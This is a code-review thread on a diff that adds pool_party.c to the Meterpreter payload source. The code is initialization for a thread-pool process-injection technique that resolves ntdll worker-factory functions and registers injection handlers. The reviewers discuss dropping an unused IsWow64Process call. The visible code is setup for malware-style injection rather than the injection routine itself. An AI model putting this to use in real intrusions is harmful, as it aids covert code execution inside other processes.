c/meterpreter/source/metsrv/pool_party.c

```diff
@@ -0,0 +1,299 @@
+			//	}
+			//}
+			//dprintf("[INJECT][inject_via_poolparty][ntdll_init] ZwAssociateWaitCompletionPacket: %p", ntdll->pZwAssociateWaitCompletionPacket);
+
+			//ntdll->pNtQueryInformationWorkerFactory = (NTSTATUS(NTAPI*)(HANDLE, _WORKERFACTORYINFOCLASS, PVOID, ULONG, PULONG))GetProcAddress(hNtDll, "NtQueryInformationWorkerFactory"); // WIN 7
+			//dprintf("[INJECT][inject_via_poolparty][ntdll_init] NtQueryInformationWorkerFactory: %p", ntdll->pNtQueryInformationWorkerFactory);
+
+			//ntdll->pNtSetInformationWorkerFactory = (NTSTATUS(NTAPI*)(HANDLE, _WORKERFACTORYINFOCLASS, PVOID, ULONG))GetProcAddress(hNtDll, "NtSetInformationWorkerFactory"); // WIN7
+			//dprintf("[INJECT][inject_via_poolparty][ntdll_init] NtSetInformationWorkerFactory: %p", ntdll->pNtSetInformationWorkerFactory);
+
+			//if (ntdll->pNtQueryInformationWorkerFactory != NULL && ntdll->pNtSetInformationWorkerFactory != NULL) {
+			//	if (poolLifeguard != NULL) {
+			//		poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].isSystemSupported = TRUE;
+			//	}
+			//}
+		}
+	}
+	return ntdll;
+}
+
+POOLPARTY_INJECTOR* GetOrInitPoolParty(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	BOOL bError = FALSE;
+	HANDLE hHeap = GetProcessHeap();
+	bError = (hHeap == NULL);
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
+
+	if (poolLifeguard != NULL) {
+		return poolLifeguard;
+	}
+
+	if (!bError) {
+		poolLifeguard = (POOLPARTY_INJECTOR*)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(POOLPARTY_INJECTOR));
+		bError = poolLifeguard == NULL;
+		
+		if(!bError) {
+			poolLifeguard->init = FALSE;
+			if (ntdll == NULL) {
+				bError = GetOrInitNtDll() == NULL;
+			}
+		}
+
+		if (!bError) {
+			if (dwSourceArch == PROCESS_ARCH_X64) {
+				if (dwDestinationArch == PROCESS_ARCH_X64) {
+					// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].isInjectionSupported = poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].isSystemSupported;
+				}
+				poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].isInjectionSupported = poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].isSystemSupported;
+			}
+		}
+
+		if (!bError) {
+			poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION].handler = remote_tp_direct_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_TP_WAIT_INSERTION].handler = remote_tp_wait_insertion;
+			// poolLifeguard->variants[POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE].handler = worker_factory_start_routine_overwrite;
+			poolLifeguard->init = TRUE;
+		}
+	}
+
+	if (bError && poolLifeguard != NULL) {
+		HeapFree(hHeap, 0, poolLifeguard);
+		poolLifeguard = NULL;
+	}
+	return poolLifeguard;
+};
+
+// For now we support only Windows 10 x64 -> Windows 10 x64
+BOOL supports_poolparty_injection(DWORD dwSourceArch, DWORD dwDestinationArch) {
+	OSVERSIONINFO os = { 0 };
+	BOOL isWow64;
+	IsWow64Process(GetCurrentProcess(), &isWow64);
```

Comment:
Sorry can you re-elaborate? if you mean actually we are not actively using the IsWow64 it's because we are not supporting native 32-bit injection (yet) and for now we don't care to understand if we are in WoW64 or x86native, I can remove the `IsWow64Process`.

Reply:
I mean `isWow64` is only referenced in the `dprintf` message on L113. If debugging is not enabled, that line will be omitted from the compiled binary. If it's not being used, then we shouldn't define `isWow64` and call `IsWow64Process` at all. You can see in [common.h](https://github.com/rapid7/metasploit-payloads/blob/e0df256c81bdb76211ae0699b4afb2fb4f9ed5ed/c/meterpreter/source/common/common.h#L83) that if `DEBUGTRACE` is not compiled, the whole line is replaced with the no op `do{}while(0);`.

Simply changing it to this would do the trick.

```c
#ifdef DEBUGTRACE
	BOOL isWow64;
	IsWow64Process(GetCurrentProcess(), &isWow64);
#endif
```

 If it gives you problems with compiling, might want cut it form here and move it down to L113 altogether:

```c
#ifdef DEBUGTRACE
	    BOOL isWow64;
	    IsWow64Process(GetCurrentProcess(), &isWow64);
        dprintf("[INJECT][supports_poolparty_injection] dwSourceArch: %d dwDestinationArch: %d isWow64: %d", dwSourceArch, dwDestinationArch, isWow64);
#endif
```

Reply:
I removed that because in this moment  we are not supporting 32-bit injection. so I don't need this check.